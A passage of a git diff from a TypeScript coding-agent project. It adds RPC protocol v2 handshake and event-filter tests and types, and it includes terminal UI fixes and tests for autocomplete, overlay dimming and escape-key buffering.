sessionId: "sess-abc", + capabilities: { + events: ["execution_complete", "cost_update"], + commands: ["init", "shutdown", "subscribe"], + }, + }; + writeLine(clientStdout, { + id: "req_1", + type: "response", + command: "init", + success: true, + data: initResult, + }); + + // Collect server response + const { lines: serverResponses, detach: detachStdout } = collectLines(clientStdout); + // Already wrote above, but let's verify the shape by re-writing + 
writeLine(clientStdout, { + id: "req_verify", + type: "response", + command: "init", + success: true, + data: initResult, + }); + await tick(); + + const resp = serverResponses[0] as any; + assert.equal(resp.type, "response"); + assert.equal(resp.command, "init"); + assert.equal(resp.success, true); + assert.equal(resp.data.protocolVersion, 2); + assert.ok(typeof resp.data.sessionId === "string"); + + detachStdin(); + detachStdout(); + }); + + it("shutdown: client writes shutdown, server acknowledges", async () => { + const { lines: clientWrites, detach } = collectLines(clientStdin); + + writeLine(clientStdin, { id: "req_2", type: "shutdown" }); + await tick(); + + const cmd = clientWrites[0] as any; + assert.equal(cmd.type, "shutdown"); + + detach(); + }); + + it("subscribe: client writes subscribe with event list", async () => { + const { lines: clientWrites, detach } = collectLines(clientStdin); + + writeLine(clientStdin, { id: "req_3", type: "subscribe", events: ["agent_end", "execution_complete"] }); + await tick(); + + const cmd = clientWrites[0] as any; + assert.equal(cmd.type, "subscribe"); + assert.deepEqual(cmd.events, ["agent_end", "execution_complete"]); + + detach(); + }); + + it("sendUIResponse: client writes extension_ui_response", async () => { + const { lines: clientWrites, detach } = collectLines(clientStdin); + + writeLine(clientStdin, { + type: "extension_ui_response", + id: "ui-123", + value: "selected-option", + }); + await tick(); + + const msg = clientWrites[0] as any; + assert.equal(msg.type, "extension_ui_response"); + assert.equal(msg.id, "ui-123"); + assert.equal(msg.value, "selected-option"); + + detach(); + }); + + it("v2 event filtering: subscribe with empty array should filter all", async () => { + // An empty event filter means no events pass through (Set with 0 entries) + const subscribeCmd = { id: "req_4", type: "subscribe", events: [] as string[] }; + const serialized = serializeJsonLine(subscribeCmd); + const parsed = 
JSON.parse(serialized); + assert.deepEqual(parsed.events, []); + // Server-side: `eventFilter = new Set([])` — Set.has(anything) returns false + const filter = new Set(parsed.events as string[]); + assert.equal(filter.has("agent_end"), false); + assert.equal(filter.has("execution_complete"), false); + assert.equal(filter.size, 0); + }); + + it("v2 event filtering: subscribe with wildcard resets filter", async () => { + // Server-side: `events.includes("*")` → `eventFilter = null` + const subscribeCmd = { type: "subscribe", events: ["*"] }; + const parsed = JSON.parse(serializeJsonLine(subscribeCmd)); + const hasWildcard = (parsed.events as string[]).includes("*"); + assert.equal(hasWildcard, true); + // When wildcard is detected, filter becomes null (all events pass) + }); + + it("multiple commands can be sent sequentially", async () => { + const { lines, detach } = collectLines(clientStdin); + + writeLine(clientStdin, { id: "1", type: "init", protocolVersion: 2 }); + writeLine(clientStdin, { id: "2", type: "subscribe", events: ["agent_end"] }); + writeLine(clientStdin, { id: "3", type: "prompt", message: "hello" }); + await tick(); + + assert.equal(lines.length, 3); + assert.equal((lines[0] as any).type, "init"); + assert.equal((lines[1] as any).type, "subscribe"); + assert.equal((lines[2] as any).type, "prompt"); + + detach(); + }); +}); + +// ============================================================================ +// Negative tests — malformed inputs, error paths, boundary conditions +// ============================================================================ + +describe("Negative tests — protocol error shapes", () => { + it("init with missing protocolVersion produces a type error at compile time", () => { + // Runtime check: a message missing protocolVersion is malformed + const malformed = { type: "init" } as any; + assert.equal(malformed.protocolVersion, undefined); + // Server would treat this as v1 lock since it's not a valid init + }); + + 
it("subscribe with non-array events is a type violation", () => { + // Runtime: server expects events to be string[] + const malformed = { type: "subscribe", events: "agent_end" } as any; + assert.equal(typeof malformed.events, "string"); // Not an array + assert.equal(Array.isArray(malformed.events), false); + }); + + it("double init error response shape", () => { + // When init is sent after protocol lock, server returns error + const errorResp: RpcResponse = { + id: "req_dup", + type: "response", + command: "init", + success: false, + error: "Protocol version already locked. init must be the first command.", + }; + assert.equal(errorResp.success, false); + if (!errorResp.success) { + assert.ok(errorResp.error.includes("already locked")); + } + }); + + it("init after v1 lock error response shape", () => { + // First command was get_state (v1 lock), then init arrives + const errorResp: RpcResponse = { + id: "req_late_init", + type: "response", + command: "init", + success: false, + error: "Protocol version already locked. 
init must be the first command.", + }; + assert.equal(errorResp.success, false); + if (!errorResp.success) { + assert.ok(errorResp.error.includes("init must be the first command")); + } + }); + + it("unknown command type produces error response", () => { + const errorResp: RpcResponse = { + id: "req_unknown", + type: "response", + command: "nonexistent", + success: false, + error: "Unknown command: nonexistent", + }; + assert.equal(errorResp.success, false); + if (!errorResp.success) { + assert.ok(errorResp.error.includes("Unknown command")); + } + }); + + it("malformed JSON parse error shape", () => { + const errorResp: RpcResponse = { + type: "response", + command: "parse", + success: false, + error: "Failed to parse command: Unexpected token", + }; + assert.equal(errorResp.command, "parse"); + assert.equal(errorResp.success, false); + }); + + it("shutdown works in both v1 and v2 — no version gating", () => { + // shutdown returns success regardless of protocolVersion + const v1Shutdown: RpcResponse = { + id: "s1", + type: "response", + command: "shutdown", + success: true, + }; + const v2Shutdown: RpcResponse = { + id: "s2", + type: "response", + command: "shutdown", + success: true, + }; + assert.equal(v1Shutdown.success, true); + assert.equal(v2Shutdown.success, true); + }); +}); + +// ============================================================================ +// Protocol version detection logic (unit) +// ============================================================================ + +describe("Protocol version detection logic", () => { + it("simulates v1 lock when first command is non-init", () => { + let protocolVersion: 1 | 2 = 1; + let protocolLocked = false; + + // Simulate first command being get_state + const command = { type: "get_state" } as RpcCommand; + + if (!protocolLocked) { + protocolLocked = true; + if (command.type === "init") { + protocolVersion = 2; + } else { + protocolVersion = 1; + } + } + + assert.equal(protocolVersion, 1); + 
assert.equal(protocolLocked, true); + }); + + it("simulates v2 lock when first command is init", () => { + let protocolVersion: 1 | 2 = 1; + let protocolLocked = false; + + const command: RpcCommand = { type: "init", protocolVersion: 2 }; + + if (!protocolLocked) { + protocolLocked = true; + if (command.type === "init") { + protocolVersion = 2; + } else { + protocolVersion = 1; + } + } + + assert.equal(protocolVersion, 2); + assert.equal(protocolLocked, true); + }); + + it("rejects re-init after v2 lock", () => { + let protocolLocked = true; // already locked from first init + let errorMessage: string | null = null; + + const command: RpcCommand = { type: "init", protocolVersion: 2 }; + + if (protocolLocked && command.type === "init") { + errorMessage = "Protocol version already locked. init must be the first command."; + } + + assert.ok(errorMessage !== null); + assert.ok(errorMessage!.includes("already locked")); + }); + + it("rejects init after v1 lock", () => { + let protocolLocked = true; // already locked from first non-init command + let protocolVersion: 1 | 2 = 1; + let errorMessage: string | null = null; + + const command: RpcCommand = { type: "init", protocolVersion: 2 }; + + if (protocolLocked && command.type === "init") { + errorMessage = "Protocol version already locked. 
init must be the first command."; + } + + assert.equal(protocolVersion, 1); // stays v1 + assert.ok(errorMessage !== null); + }); + + it("extension_ui_response bypasses protocol detection", () => { + let protocolLocked = false; + let protocolDetectionTriggered = false; + + // Simulate the handleInputLine logic + const parsed = { type: "extension_ui_response", id: "ui-1", value: "ok" }; + + if (parsed.type === "extension_ui_response") { + // Bypass — do not touch protocolLocked + } else { + protocolDetectionTriggered = true; + if (!protocolLocked) { + protocolLocked = true; + } + } + + assert.equal(protocolLocked, false); + assert.equal(protocolDetectionTriggered, false); + }); +}); + +// ============================================================================ +// v2 event filter logic (unit) +// ============================================================================ + +describe("v2 event filter logic", () => { + /** Mimics the server-side event filter check: null means all events pass */ + function shouldEmit(filter: Set | null, eventType: string): boolean { + return !filter || filter.has(eventType); + } + + it("null filter passes all events", () => { + assert.equal(shouldEmit(null, "agent_end"), true); + assert.equal(shouldEmit(null, "cost_update"), true); + assert.equal(shouldEmit(null, "anything"), true); + }); + + it("filter with specific events passes matching events", () => { + const filter = new Set(["agent_end", "cost_update"]); + + assert.equal(shouldEmit(filter, "agent_end"), true); + assert.equal(shouldEmit(filter, "cost_update"), true); + assert.equal(shouldEmit(filter, "execution_complete"), false); + assert.equal(shouldEmit(filter, "message_start"), false); + }); + + it("empty Set filter blocks all events", () => { + const filter = new Set(); + + assert.equal(shouldEmit(filter, "agent_end"), false); + assert.equal(shouldEmit(filter, "cost_update"), false); + assert.equal(shouldEmit(filter, "anything"), false); + assert.equal(filter.size, 0); 
+ }); + + it("wildcard subscribe resets filter to null", () => { + let eventFilter: Set | null = new Set(["agent_end"]); + + // Simulate subscribe with wildcard + const events = ["*"]; + if (events.includes("*")) { + eventFilter = null; + } else { + eventFilter = new Set(events); + } + + assert.equal(eventFilter, null); + }); + + it("subscribe replaces previous filter", () => { + let eventFilter: Set | null = new Set(["agent_end"]); + + // Subscribe with different events + const events = ["cost_update", "execution_complete"]; + if (events.includes("*")) { + eventFilter = null; + } else { + eventFilter = new Set(events); + } + + assert.equal(eventFilter!.has("agent_end"), false); + assert.equal(eventFilter!.has("cost_update"), true); + assert.equal(eventFilter!.has("execution_complete"), true); + }); + + it("filter applies to both regular and synthesized v2 events", () => { + const eventFilter = new Set(["execution_complete"]); + + // Regular event + assert.equal(eventFilter.has("agent_end"), false); // filtered out + // Synthesized v2 event + assert.equal(eventFilter.has("execution_complete"), true); // passes + assert.equal(eventFilter.has("cost_update"), false); // filtered out + }); +}); + +// ============================================================================ +// v2 runId injection logic (unit) +// ============================================================================ + +describe("v2 runId injection", () => { + it("runId is present when protocolVersion is 2 and command is prompt/steer/follow_up", () => { + const protocolVersion = 2; + const commands = ["prompt", "steer", "follow_up"] as const; + + for (const cmdType of commands) { + const runId = protocolVersion === 2 ? 
`run-${cmdType}-uuid` : undefined; + assert.ok(runId !== undefined, `runId should be generated for ${cmdType} in v2`); + assert.ok(typeof runId === "string"); + } + }); + + it("runId is undefined when protocolVersion is 1", () => { + // Test the v1 path: runId should not be generated + function generateRunId(version: 1 | 2): string | undefined { + return version === 2 ? "run-uuid" : undefined; + } + assert.equal(generateRunId(1), undefined); + assert.ok(typeof generateRunId(2) === "string"); + }); + + it("runId is injected into event output via spread", () => { + const currentRunId = "run-abc-123"; + const event = { type: "message_start", message: { role: "assistant" } }; + + // v2 injection logic from rpc-mode.ts + const outputEvent = currentRunId ? { ...event, runId: currentRunId } : event; + + assert.equal((outputEvent as any).runId, "run-abc-123"); + assert.equal((outputEvent as any).type, "message_start"); + }); + + it("runId is not injected when null", () => { + const currentRunId: string | null = null; + const event = { type: "message_start", message: { role: "assistant" } }; + + const outputEvent = currentRunId ? { ...event, runId: currentRunId } : event; + + assert.equal((outputEvent as any).runId, undefined); + }); +}); diff --git a/packages/pi-coding-agent/src/modes/rpc/rpc-types.ts b/packages/pi-coding-agent/src/modes/rpc/rpc-types.ts index a1b7a7711..20d5c2c73 100644 --- a/packages/pi-coding-agent/src/modes/rpc/rpc-types.ts +++ b/packages/pi-coding-agent/src/modes/rpc/rpc-types.ts @@ -11,6 +11,13 @@ import type { SessionStats } from "../../core/agent-session.js"; import type { BashResult } from "../../core/bash-executor.js"; import type { CompactionResult } from "../../core/compaction/index.js"; +// ============================================================================ +// RPC Protocol Versioning +// ============================================================================ + +/** Supported protocol versions. 
v1 is the implicit default; v2 requires an init handshake. */ +export type RpcProtocolVersion = 1 | 2; + // ============================================================================ // RPC Commands (stdin) // ============================================================================ @@ -69,7 +76,12 @@ export type RpcCommand = // Bridge-hosted native terminal | { id?: string; type: "terminal_input"; data: string } | { id?: string; type: "terminal_resize"; cols: number; rows: number } - | { id?: string; type: "terminal_redraw" }; + | { id?: string; type: "terminal_redraw" } + + // v2 Protocol + | { id?: string; type: "init"; protocolVersion: 2; clientId?: string } + | { id?: string; type: "shutdown"; graceful?: boolean } + | { id?: string; type: "subscribe"; events: string[] }; // ============================================================================ // RPC Slash Command (for get_commands response) @@ -120,9 +132,9 @@ export interface RpcSessionState { // Success responses with data export type RpcResponse = // Prompting (async - events follow) - | { id?: string; type: "response"; command: "prompt"; success: true } - | { id?: string; type: "response"; command: "steer"; success: true } - | { id?: string; type: "response"; command: "follow_up"; success: true } + | { id?: string; type: "response"; command: "prompt"; success: true; runId?: string } + | { id?: string; type: "response"; command: "steer"; success: true; runId?: string } + | { id?: string; type: "response"; command: "follow_up"; success: true; runId?: string } | { id?: string; type: "response"; command: "abort"; success: true } | { id?: string; type: "response"; command: "new_session"; success: true; data: { cancelled: boolean } } @@ -216,9 +228,54 @@ export type RpcResponse = | { id?: string; type: "response"; command: "terminal_resize"; success: true } | { id?: string; type: "response"; command: "terminal_redraw"; success: true } + // v2 Protocol + | { id?: string; type: "response"; command: 
"init"; success: true; data: RpcInitResult } + | { id?: string; type: "response"; command: "shutdown"; success: true } + | { id?: string; type: "response"; command: "subscribe"; success: true } + // Error response (any command can fail) | { id?: string; type: "response"; command: string; success: false; error: string }; +// ============================================================================ +// v2 Protocol Types +// ============================================================================ + +/** Result of the init handshake (v2 only) */ +export interface RpcInitResult { + protocolVersion: 2; + sessionId: string; + capabilities: { + events: string[]; + commands: string[]; + }; +} + +/** v2 execution_complete event — emitted when a prompt/steer/follow_up finishes */ +export interface RpcExecutionCompleteEvent { + type: "execution_complete"; + runId: string; + status: "completed" | "error" | "cancelled"; + reason?: string; + stats: SessionStats; +} + +/** v2 cost_update event — emitted per-turn with running cost data */ +export interface RpcCostUpdateEvent { + type: "cost_update"; + runId: string; + turnCost: number; + cumulativeCost: number; + tokens: { + input: number; + output: number; + cacheRead: number; + cacheWrite: number; + }; +} + +/** Discriminated union of all v2-only event types */ +export type RpcV2Event = RpcExecutionCompleteEvent | RpcCostUpdateEvent; + // ============================================================================ // Extension UI Events (stdout) // ============================================================================ diff --git a/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts b/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts index f31a40b7b..b4c1dd6dd 100644 --- a/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts +++ b/packages/pi-coding-agent/src/resources/extensions/memory/storage.test.ts @@ -1,5 +1,5 @@ import assert from 
"node:assert/strict"; -import { describe, it, mock } from "node:test"; +import { describe, it, afterEach } from "node:test"; import { mkdtempSync, rmSync, readFileSync, existsSync } from "node:fs"; import { join } from "node:path"; import { tmpdir } from "node:os"; @@ -15,84 +15,84 @@ function wait(ms: number): Promise { } describe("MemoryStorage debounced persistence", () => { - it("multiple rapid mutations only trigger one persist write", async () => { - const dir = makeTmpDir(); - const dbPath = join(dir, "test.db"); - try { - const storage = await MemoryStorage.create(dbPath); + let dir: string; - const initialStat = readFileSync(dbPath); - const initialMtime = initialStat.length; - - storage.upsertThreads([ - { threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" }, - ]); - storage.upsertThreads([ - { threadId: "t2", filePath: "/b.txt", fileSize: 200, fileMtime: 2000, cwd: "/proj" }, - ]); - storage.upsertThreads([ - { threadId: "t3", filePath: "/c.txt", fileSize: 300, fileMtime: 3000, cwd: "/proj" }, - ]); - - const afterMutationsBuf = readFileSync(dbPath); - assert.deepEqual( - afterMutationsBuf, - initialStat, - "File should not have been written yet (debounce window has not elapsed)", - ); - - await wait(700); - - const afterDebounceBuf = readFileSync(dbPath); - assert.notDeepEqual( - afterDebounceBuf, - initialStat, - "File should have been written after debounce window elapsed", - ); - - const stats = storage.getStats(); - assert.equal(stats.totalThreads, 3); - - storage.close(); - } finally { + afterEach(() => { + if (dir) { rmSync(dir, { recursive: true, force: true }); } }); + it("multiple rapid mutations only trigger one persist write", async () => { + dir = makeTmpDir(); + const dbPath = join(dir, "test.db"); + const storage = await MemoryStorage.create(dbPath); + + const initialStat = readFileSync(dbPath); + const initialMtime = initialStat.length; + + storage.upsertThreads([ + { threadId: "t1", filePath: "/a.txt", 
fileSize: 100, fileMtime: 1000, cwd: "/proj" }, + ]); + storage.upsertThreads([ + { threadId: "t2", filePath: "/b.txt", fileSize: 200, fileMtime: 2000, cwd: "/proj" }, + ]); + storage.upsertThreads([ + { threadId: "t3", filePath: "/c.txt", fileSize: 300, fileMtime: 3000, cwd: "/proj" }, + ]); + + const afterMutationsBuf = readFileSync(dbPath); + assert.deepEqual( + afterMutationsBuf, + initialStat, + "File should not have been written yet (debounce window has not elapsed)", + ); + + await wait(700); + + const afterDebounceBuf = readFileSync(dbPath); + assert.notDeepEqual( + afterDebounceBuf, + initialStat, + "File should have been written after debounce window elapsed", + ); + + const stats = storage.getStats(); + assert.equal(stats.totalThreads, 3); + + storage.close(); + }); + it("close() flushes pending changes immediately without waiting for debounce", async () => { - const dir = makeTmpDir(); + dir = makeTmpDir(); const dbPath = join(dir, "test.db"); - try { - const storage = await MemoryStorage.create(dbPath); + const storage = await MemoryStorage.create(dbPath); - const initialBuf = readFileSync(dbPath); + const initialBuf = readFileSync(dbPath); - storage.upsertThreads([ - { threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" }, - ]); + storage.upsertThreads([ + { threadId: "t1", filePath: "/a.txt", fileSize: 100, fileMtime: 1000, cwd: "/proj" }, + ]); - const beforeCloseBuf = readFileSync(dbPath); - assert.deepEqual( - beforeCloseBuf, - initialBuf, - "File should not have been written yet (debounce window has not elapsed)", - ); + const beforeCloseBuf = readFileSync(dbPath); + assert.deepEqual( + beforeCloseBuf, + initialBuf, + "File should not have been written yet (debounce window has not elapsed)", + ); - storage.close(); + storage.close(); - const afterCloseBuf = readFileSync(dbPath); - assert.notDeepEqual( - afterCloseBuf, - initialBuf, - "File should have been written immediately on close()", - ); + const afterCloseBuf = 
readFileSync(dbPath); + assert.notDeepEqual( + afterCloseBuf, + initialBuf, + "File should have been written immediately on close()", + ); - const reopened = await MemoryStorage.create(dbPath); - const stats = reopened.getStats(); - assert.equal(stats.totalThreads, 1, "Data should be persisted and readable after close"); - reopened.close(); - } finally { - rmSync(dir, { recursive: true, force: true }); - } + const reopened = await MemoryStorage.create(dbPath); + const stats = reopened.getStats(); + assert.equal(stats.totalThreads, 1, "Data should be persisted and readable after close"); + reopened.close(); }); }); diff --git a/packages/pi-coding-agent/src/utils/shell.ts b/packages/pi-coding-agent/src/utils/shell.ts index ba77a4441..86708125f 100644 --- a/packages/pi-coding-agent/src/utils/shell.ts +++ b/packages/pi-coding-agent/src/utils/shell.ts @@ -192,7 +192,6 @@ export function killProcessTree(pid: number): void { try { spawn("taskkill", ["/F", "/T", "/PID", String(pid)], { stdio: "ignore", - detached: true, }); } catch { // Ignore errors if taskkill fails diff --git a/packages/pi-tui/src/__tests__/autocomplete.test.ts b/packages/pi-tui/src/__tests__/autocomplete.test.ts index c4a44db76..e065f8f6b 100644 --- a/packages/pi-tui/src/__tests__/autocomplete.test.ts +++ b/packages/pi-tui/src/__tests__/autocomplete.test.ts @@ -52,6 +52,14 @@ describe("CombinedAutocompleteProvider — slash commands", () => { const result = provider.getSuggestions(["hello /se"], 0, 9); assert.equal(result, null); }); + + it("triggers slash commands after leading whitespace", () => { + const provider = makeProvider(sampleCommands); + const result = provider.getSuggestions([" /se"], 0, 5); + assert.ok(result); + assert.equal(result!.prefix, "/se"); + assert.ok(result!.items.some((item) => item.value === "settings")); + }); }); describe("CombinedAutocompleteProvider — argument completions", () => { @@ -144,6 +152,13 @@ describe("CombinedAutocompleteProvider — applyCompletion", () => { 
assert.equal(result.cursorCol, 10); // after "/settings " }); + it("preserves leading whitespace when applying slash command completion", () => { + const provider = makeProvider(sampleCommands); + const result = provider.applyCompletion([" /se"], 0, 5, { value: "settings", label: "settings" }, "/se"); + assert.equal(result.lines[0], " /settings "); + assert.equal(result.cursorCol, 12); + }); + it("applies file path completion for @ prefix", () => { const provider = makeProvider(); const result = provider.applyCompletion( diff --git a/packages/pi-tui/src/__tests__/overlay-layout.test.ts b/packages/pi-tui/src/__tests__/overlay-layout.test.ts new file mode 100644 index 000000000..49d0539da --- /dev/null +++ b/packages/pi-tui/src/__tests__/overlay-layout.test.ts @@ -0,0 +1,82 @@ +// pi-tui — Overlay Layout Tests (backdrop dimming) + +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; +import { compositeOverlays, type OverlayEntry } from "../overlay-layout.js"; + +function makeEntry( + lines: string[], + options?: OverlayEntry["options"], +): OverlayEntry { + return { + component: { render: () => lines }, + options, + hidden: false, + focusOrder: 1, + }; +} + +describe("compositeOverlays — backdrop", () => { + it("dims base lines when backdrop is true", () => { + const base = ["hello world", "second line"]; + const overlay = makeEntry(["OVERLAY"], { + width: 7, + anchor: "top-left", + backdrop: true, + }); + + const result = compositeOverlays(base, [overlay], 20, 20, 2); + + // All base lines in viewport should contain dim escape (\x1b[2m) + // The overlay line itself is composited on top, but underlying lines get dimmed + const dimmedLine = result.find((l) => l.includes("second line")); + assert.ok(dimmedLine, "should have a line containing 'second line'"); + assert.ok(dimmedLine.includes("\x1b[2m"), "base line should be dimmed"); + }); + + it("backdrop uses gray foreground for dimming", () => { + const base = ["hello world", "second 
line"]; + const overlay = makeEntry(["OV"], { + width: 2, + anchor: "top-left", + backdrop: true, + }); + + const result = compositeOverlays(base, [overlay], 20, 20, 2); + + // Check a non-overlay line for backdrop codes (dim + gray fg, no bg) + const line = result.find((l) => l.includes("second line")); + assert.ok(line, "should have a line containing 'second line'"); + assert.ok(line.includes("\x1b[38;5;240m"), "backdrop should set gray foreground"); + assert.ok(!line.includes("\x1b[48;"), "backdrop should not set background color"); + }); + + it("does not dim when backdrop is false/absent", () => { + const base = ["hello world", "second line"]; + const overlay = makeEntry(["OVERLAY"], { + width: 7, + anchor: "top-left", + }); + + const result = compositeOverlays(base, [overlay], 20, 20, 2); + + // Lines not covered by overlay should remain undimmed + const secondLine = result.find((l) => l.includes("second line")); + assert.ok(secondLine, "should have a line containing 'second line'"); + assert.ok(!secondLine.includes("\x1b[2m"), "base line should not be dimmed"); + }); + + it("overlay content renders on top of dimmed background", () => { + const base = ["aaaaaaaaaa"]; + const overlay = makeEntry(["XX"], { + width: 2, + anchor: "top-left", + backdrop: true, + }); + + const result = compositeOverlays(base, [overlay], 10, 10, 1); + + // The first line should contain the overlay text + assert.ok(result[0].includes("XX"), "overlay text should be composited"); + }); +}); diff --git a/packages/pi-tui/src/__tests__/stdin-buffer.test.ts b/packages/pi-tui/src/__tests__/stdin-buffer.test.ts new file mode 100644 index 000000000..ba053567b --- /dev/null +++ b/packages/pi-tui/src/__tests__/stdin-buffer.test.ts @@ -0,0 +1,43 @@ +import assert from "node:assert/strict"; +import { describe, it } from "node:test"; +import { setTimeout as delay } from "node:timers/promises"; + +import { StdinBuffer } from "../stdin-buffer.js"; + +describe("StdinBuffer", () => { + it("flushes a 
lone Escape keypress", async () => { + const buffer = new StdinBuffer({ timeout: 5 }); + const received: string[] = []; + buffer.on("data", (sequence) => received.push(sequence)); + + buffer.process("\x1b"); + await delay(20); + + assert.deepEqual(received, ["\x1b"]); + assert.equal(buffer.getBuffer(), ""); + }); + + it("keeps split CSI focus and mouse sequences buffered until completion", async () => { + const buffer = new StdinBuffer({ timeout: 5 }); + const received: string[] = []; + buffer.on("data", (sequence) => received.push(sequence)); + + buffer.process("\x1b["); + await delay(20); + assert.deepEqual(received, []); + assert.equal(buffer.getBuffer(), "\x1b["); + + buffer.process("I"); + assert.deepEqual(received, ["\x1b[I"]); + assert.equal(buffer.getBuffer(), ""); + + buffer.process("\x1b[<35;20;"); + await delay(20); + assert.deepEqual(received, ["\x1b[I"]); + assert.equal(buffer.getBuffer(), "\x1b[<35;20;"); + + buffer.process("5m"); + assert.deepEqual(received, ["\x1b[I", "\x1b[<35;20;5m"]); + assert.equal(buffer.getBuffer(), ""); + }); +}); diff --git a/packages/pi-tui/src/__tests__/tui.test.ts b/packages/pi-tui/src/__tests__/tui.test.ts new file mode 100644 index 000000000..7c4903dc7 --- /dev/null +++ b/packages/pi-tui/src/__tests__/tui.test.ts @@ -0,0 +1,50 @@ +import assert from "node:assert/strict"; +import { describe, it } from "node:test"; + +import { TUI } from "../tui.js"; +import type { Terminal } from "../terminal.js"; + +function makeTerminal(): Terminal { + return { + isTTY: true, + columns: 80, + rows: 24, + kittyProtocolActive: false, + start() {}, + stop() {}, + drainInput: async () => {}, + write() {}, + moveBy() {}, + hideCursor() {}, + showCursor() {}, + clearLine() {}, + clearFromCursor() {}, + clearScreen() {}, + setTitle() {}, + }; +} + +describe("TUI", () => { + it("does not swallow a bare Escape keypress while waiting for the cell-size response", () => { + const tui = new TUI(makeTerminal()); + const received: string[] = []; + + 
tui.setFocus({ + render: () => [], + handleInput: (data: string) => { + received.push(data); + }, + invalidate() {}, + }); + + const anyTui = tui as any; + anyTui.cellSizeQueryPending = true; + anyTui.inputBuffer = ""; + + anyTui.handleInput("\x1b"); + + assert.deepEqual(received, ["\x1b"]); + assert.equal(anyTui.cellSizeQueryPending, false); + assert.equal(anyTui.inputBuffer, ""); + }); +}); diff --git a/packages/pi-tui/src/autocomplete.ts b/packages/pi-tui/src/autocomplete.ts index d0969921f..1ecd1e754 100644 --- a/packages/pi-tui/src/autocomplete.ts +++ b/packages/pi-tui/src/autocomplete.ts @@ -159,6 +159,7 @@ export class CombinedAutocompleteProvider implements AutocompleteProvider { ): { items: AutocompleteItem[]; prefix: string } | null { const currentLine = lines[cursorLine] || ""; const textBeforeCursor = currentLine.slice(0, cursorCol); + const trimmedBeforeCursor = textBeforeCursor.trimStart(); // Check for @ file reference (fuzzy search) - must be after a delimiter or at start const atPrefix = this.extractAtPrefix(textBeforeCursor); @@ -174,12 +175,12 @@ export class CombinedAutocompleteProvider implements AutocompleteProvider { } // Check for slash commands - if (textBeforeCursor.startsWith("/")) { - const spaceIndex = textBeforeCursor.indexOf(" "); + if (trimmedBeforeCursor.startsWith("/")) { + const spaceIndex = trimmedBeforeCursor.indexOf(" "); if (spaceIndex === -1) { // No space yet - complete command names with fuzzy matching - const prefix = textBeforeCursor.slice(1); // Remove the "/" + const prefix = trimmedBeforeCursor.slice(1); // Remove the "/" const commandItems = this.commands.map((cmd) => ({ name: "name" in cmd ? cmd.name : cmd.value, label: "name" in cmd ? 
cmd.name : cmd.label, @@ -196,12 +197,12 @@ export class CombinedAutocompleteProvider implements AutocompleteProvider { return { items: filtered, - prefix: textBeforeCursor, + prefix: `/${prefix}`, }; } else { // Space found - complete command arguments - const commandName = textBeforeCursor.slice(1, spaceIndex); // Command without "/" - const argumentText = textBeforeCursor.slice(spaceIndex + 1); // Text after space + const commandName = trimmedBeforeCursor.slice(1, spaceIndex); // Command without "/" + const argumentText = trimmedBeforeCursor.slice(spaceIndex + 1); // Text after space const command = this.commands.find((cmd) => { const name = "name" in cmd ? cmd.name : cmd.value; @@ -269,7 +270,8 @@ export class CombinedAutocompleteProvider implements AutocompleteProvider { // Check if we're completing a slash command (prefix starts with "/" but NOT a file path) // Slash commands are at the start of the line and don't contain path separators after the first / - const isSlashCommand = prefix.startsWith("/") && beforePrefix.trim() === "" && !prefix.slice(1).includes("/"); + const trimmedPrefix = prefix.trimStart(); + const isSlashCommand = trimmedPrefix.startsWith("/") && beforePrefix.trim() === "" && !trimmedPrefix.slice(1).includes("/"); if (isSlashCommand) { // This is a command name completion const newLine = `${beforePrefix}/${item.value} ${adjustedAfterCursor}`; diff --git a/packages/pi-tui/src/components/__tests__/editor.test.ts b/packages/pi-tui/src/components/__tests__/editor.test.ts new file mode 100644 index 000000000..057ed20da --- /dev/null +++ b/packages/pi-tui/src/components/__tests__/editor.test.ts @@ -0,0 +1,64 @@ +import assert from "node:assert/strict"; +import { describe, it } from "node:test"; + +import { Editor, type EditorTheme } from "../editor.js"; +import { CURSOR_MARKER, TUI } from "../../tui.js"; +import type { Terminal } from "../../terminal.js"; + +function makeTerminal(): Terminal { + return { + isTTY: true, + columns: 80, + rows: 24, 
+ kittyProtocolActive: false, + start() {}, + stop() {}, + drainInput: async () => {}, + write() {}, + moveBy() {}, + hideCursor() {}, + showCursor() {}, + clearLine() {}, + clearFromCursor() {}, + clearScreen() {}, + setTitle() {}, + }; +} + +const theme: EditorTheme = { + borderColor: (text) => text, + selectList: { + selectedPrefix: (text) => text, + selectedText: (text) => text, + description: (text) => text, + scrollInfo: (text) => text, + noMatch: (text) => text, + }, +}; + +describe("Editor", () => { + it("clears bracketed paste state when focus is lost", () => { + const editor = new Editor(new TUI(makeTerminal()), theme); + editor.focused = true; + + editor.handleInput("\x1b[200~partial"); + editor.focused = false; + editor.focused = true; + editor.handleInput("hello"); + + assert.equal(editor.getText(), "hello"); + }); + + it("keeps the hardware cursor marker visible while autocomplete is open", () => { + const editor = new Editor(new TUI(makeTerminal()), theme); + editor.focused = true; + editor.setText("/se"); + + (editor as any).autocompleteState = "regular"; + (editor as any).autocompleteList = { render: () => [] }; + + const rendered = editor.render(40).join("\n"); + + assert.ok(rendered.includes(CURSOR_MARKER)); + }); +}); diff --git a/packages/pi-tui/src/components/box.ts b/packages/pi-tui/src/components/box.ts index c99b8600b..9dd692750 100644 --- a/packages/pi-tui/src/components/box.ts +++ b/packages/pi-tui/src/components/box.ts @@ -31,6 +31,16 @@ export class Box implements Component { this.invalidateCache(); } + insertChildBefore(component: Component, before: Component): void { + const index = this.children.indexOf(before); + if (index !== -1) { + this.children.splice(index, 0, component); + } else { + this.children.push(component); + } + this.invalidateCache(); + } + removeChild(component: Component): void { const index = this.children.indexOf(component); if (index !== -1) { diff --git a/packages/pi-tui/src/components/editor.ts 
